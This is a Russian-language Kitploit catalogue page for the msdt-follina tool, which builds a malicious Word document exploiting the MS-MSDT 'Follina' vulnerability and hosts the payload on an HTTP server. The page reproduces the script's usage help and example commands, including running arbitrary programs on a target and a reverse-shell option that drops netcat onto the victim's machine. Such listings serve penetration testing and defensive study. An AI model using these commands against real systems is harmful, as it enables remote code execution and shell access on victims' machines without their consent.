Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
msdt-follina — Генерирует вредоносный документ Microsoft Word, эксплуатирующий уязвимость MS-MSDT «Follina», для выполнения произвольных команд или развёртывания полезных нагрузок через HTTP-сервер. | Kitploit
Инструменты/GitHubGitHub/johnhammond/msdt-follina
ЭксплуатацияЭксплуатация веб-приложенийФишингКомандование и УправлениеРазработка Полезной Нагрузки
GitHubjohnhammond/msdt-follina

msdt-follina

Генерирует вредоносный документ Microsoft Word, эксплуатирующий уязвимость MS-MSDT «Follina», для выполнения произвольных команд или развёртывания полезных нагрузок через HTTP-сервер.

Репозиторий
1.6k370104 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Вектор атаки MS-MSDT «Follina»

John Hammond | 30 мая 2022 г.


Создайте атаку MS-MSDT «Follina» с помощью вредоносного документа Microsoft Word и разместите полезную нагрузку на HTTP-сервере.

Screenshot

Использование

root@kitploit:~
usage: follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)

Примеры

Запустить calc.exe:

root@kitploit:~
$ python3 follina.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

Запустить notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"

Получить обратную оболочку на порту 9001. Обратите внимание: этот метод загружает бинарный файл netcat на жертву и помещает его в C:\Windows\Tasks. Он не удаляет бинарный файл после использования. Это вызовет срабатывание антивирусных детекторов, если только антивирус не отключен.

root@kitploit:~
$ python3 follina.py -r 9001

Reverse Shell

Скачать инструмент